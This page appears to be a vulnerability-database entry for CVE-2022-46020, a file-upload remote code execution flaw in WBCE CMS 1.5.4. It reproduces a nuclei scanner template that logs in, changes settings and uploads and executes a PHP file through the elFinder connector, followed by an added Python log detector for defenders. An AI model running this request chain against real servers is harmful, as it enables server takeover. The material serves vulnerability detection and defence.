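Vulnerability Information
Vulnerability name: WBCE CMS v1.5.4 - Remote Code Execution
Vulnerability ID:
Vulnerability type: File upload
Severity: Critical
Description: WBCE CMS is an open-source content management system widely used to build and manage websites. It provides a user-friendly interface and features such as page management, a media library and template editing, and suits website deployments of all sizes. Version 1.5.4 of the system contains a critical remote code execution vulnerability.
The root cause is that WBCE CMS v1.5.4 does not correctly validate the type of uploaded files when handling file uploads, so an attacker can bypass the security restriction by modifying the upload file type and upload a malicious PHP file. This is a file upload vulnerability: the server-side check of the client-submitted file type is not strict, which lets an attacker upload and execute arbitrary code.
An attacker who successfully exploits this vulnerability can execute arbitrary code on the affected system and take full control of the server, which may lead to data leakage, service disruption or other malicious activity. Exploitation requires valid user credentials, that is, the attack is only possible after authentication. Because of its severity and ease of exploitation, the vulnerability is rated critical. Users are advised to upgrade immediately to WBCE CMS v1.5.5 or later to fix it.
Vendor: wbce
Product: wbce_cms
Affected version: 1.5.4
Source: https://github.com/projectdiscovery/nuclei-templates/blob/953302e619aede40dca8ce943aa33a853d2d388f/http%2Fcves%2F2022%2FCVE-2022-46020.yaml
Type: projectdiscovery/nuclei-templates:github issues
POC Details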
```yaml
id: CVE-2022-46020

info:
  name: WBCE CMS v1.5.4 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.
  reference:
    - https://github.com/WBCE/WBCE_CMS
    - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46020
    cwe-id: CWE-434
    epss-score: 0.84584
    epss-percentile: 0.99281
    cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: wbce
    product: wbce_cms
  tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive

http:
  - raw:
      - |
        GET /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
      - |
        GET /admin/settings/index.php?advanced=yes HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/settings/save.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
      - |
        POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988

        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="reqid"

        test
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="cmd"

        upload
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="target"

        l1_Lw
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php

        echo md5("CVE-2022-46020");

        ?>

        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="mtime[]"

        1
        -----------------------------213974337328367932543216511988--
      - |
        GET /media/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_6
        words:
          - 751a8ba516522786d551075a092a7a84

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: username_fieldname
        group: 1
        regex:
          - name="username_fieldname" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: password_fieldname
        group: 1
        regex:
          - name="password_fieldname" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: formtoken
        group: 1
        regex:
          - name="formtoken" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: app_name
        group: 1
        regex:
          - name="app_name" value="(.*)"
        internal: true
        part: body
```
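For defenders reviewing web server logs: the following is an added example, not part of the original page or of the nuclei-templates project. It flags a client that POSTs to the elFinder connector path used in the template and then receives a 200 for a PHP file under /media. The combined log format, the 10-minute window, the extensions other than .php and the sample log lines are assumptions.

```python
import re
from datetime import datetime, timedelta

# Request paths taken from the template on this page.
CONNECTOR = "/modules/elfinder/ef/php/connector.wbce.php"
SETTINGS_SAVE = "/admin/settings/save.php"
# PHP-handled file under /media; extensions other than .php are an assumption.
MEDIA_PHP = re.compile(r"^/media/.*\.ph(?:p\d?|tml|ar)$", re.I)
# Prefix of a common/combined access log line (assumed log format).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample access log, not taken from a real system.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "POST /admin/login/index.php HTTP/1.1" 302 0
192.0.2.10 - - [12/Mar/2024:10:00:05 +0000] "POST /admin/settings/save.php HTTP/1.1" 200 512
192.0.2.10 - - [12/Mar/2024:10:00:09 +0000] "POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1" 200 310
192.0.2.10 - - [12/Mar/2024:10:00:12 +0000] "GET /media/a1b2c3.php HTTP/1.1" 200 32
198.51.100.7 - - [12/Mar/2024:10:05:00 +0000] "POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1" 200 298
198.51.100.7 - - [12/Mar/2024:10:05:03 +0000] "GET /media/logo.png HTTP/1.1" 200 20480
203.0.113.5 - - [12/Mar/2024:10:06:00 +0000] "GET /media/old.php HTTP/1.1" 404 0
"""

def find_upload_then_execute(lines, window=timedelta(minutes=10)):
    """Flag a 200 on /media/*.php that follows a connector POST from the same client."""
    uploads, settings, findings = {}, {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, path = m["ip"], m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == SETTINGS_SAVE:
            settings[ip] = ts   # settings saved by this client
        elif m["method"] == "POST" and path == CONNECTOR:
            uploads[ip] = ts    # file manager request by this client
        elif MEDIA_PHP.match(path) and m["status"] == "200":
            up = uploads.get(ip)
            if up is not None and timedelta(0) <= ts - up <= window:
                changed = settings.get(ip)
                findings.append({
                    "ip": ip, "path": path, "time": ts.isoformat(),
                    "settings_saved_before_upload": changed is not None and changed <= up,
                })
    return findings

if __name__ == "__main__":
    for finding in find_upload_then_execute(SAMPLE_LOG.splitlines()):
        print(finding)
```

Any executable PHP file served from the media directory is worth investigating on its own; the correlation with the connector POST narrows results to the sequence shown in the template.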